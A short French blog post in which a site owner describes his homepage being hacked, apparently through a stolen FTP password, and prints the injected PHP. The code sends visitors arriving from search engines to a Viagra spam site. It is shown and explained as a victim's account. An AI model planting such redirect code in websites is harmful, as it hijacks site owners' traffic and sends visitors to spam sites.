Hacker en mousse

Tiens je viens de découvrir que cela fait 3 mois que la homepage de mon site est inaccessible depuis les moteurs de recherches. En fait un petit malin a probablement trouvé le mot de passe FTP et s’est amusé à ajouter ça dans mon fichier d’index :

<?php if($url=='') { $url='http://monsitedeviagrademerde; } ?>
<?php if($url=='') { $url='http://encoredelamerde/update.php'; } ?>
<?php if(stristr($_SERVER['HTTP_REFERER'],'google') OR stristr($_SERVER['HTTP_REFERER'],'bing') 
OR stristr($_SERVER['HTTP_REFERER'],'yahoo') 
OR stristr($_SERVER['HTTP_REFERER'],'aol') 
OR stristr($_SERVER['HTTP_REFERER'],'search')) { header('Location: '.$url); die(); } ?>

En gros ça dit au serveur « si la personne qui cherche à charger cette page vient d’un moteur de recherches, affiche ce superbe site de ventes de Viagra à la place « .

Vous me demanderez probablement pourquoi cela a été aussi long à identifier ? D’une part je ne suis pas un expert serveur (c’est même tout le contraire) et d’autre part je ne monitore pas du tout ce qui se passe dessus. En tout cas cela explique la perte de trafic que je pensais plutôt liée au manque d’attrait de la thématique (windows 7, à l’époque de Windows 8…).

En tout cas cela m’apprendra à regarder un peu mieux ce qui se trame sur ce site.

Monsieur le hacker/je ne sais quoi en carton, je ne vous félicite pas !